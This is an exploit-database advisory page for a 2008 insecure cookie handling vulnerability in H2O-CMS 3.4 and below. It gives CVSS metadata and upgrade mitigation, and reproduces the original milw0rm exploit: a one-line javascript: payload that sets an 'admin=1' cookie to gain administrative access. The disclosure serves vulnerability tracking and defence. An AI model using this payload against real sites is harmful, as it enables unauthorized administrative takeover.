header-logo
Suggest Exploit
vendor:
H2O-CMS
by:
Mountassif Moad
8.8
CVSS
HIGH
Insecure Cookie Handling
613
CWE
Product Name: H2O-CMS
Affected Version From: 3.4 and below
Affected Version To: 3.4 and below
Patch Exists: YES
Related CWE: N/A
CPE: h2o-cms
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

H2O-CMS <= 3.4 Insecure Cookie Handling Vulnerability

A vulnerability in H2O-CMS version 3.4 and below allows an attacker to set an admin cookie by using a malicious JavaScript code. This can be exploited to gain administrative access to the application.

Mitigation:

Upgrade to the latest version of H2O-CMS.
Source

Exploit-DB raw data:

# ----------------------------------------------------------
# H2O-CMS <= 3.4 Insecure Cookie Handling Vulnerability
# Discovered By Mountassif Moad
# Download On http://sourceforge.net/projects/h2o-cms
# Home World http://v4-team.com
# ----------------------------------------------------------
Exploit:
javascript:document.cookie = "admin=1; path=/";

# milw0rm.com [2008-10-29]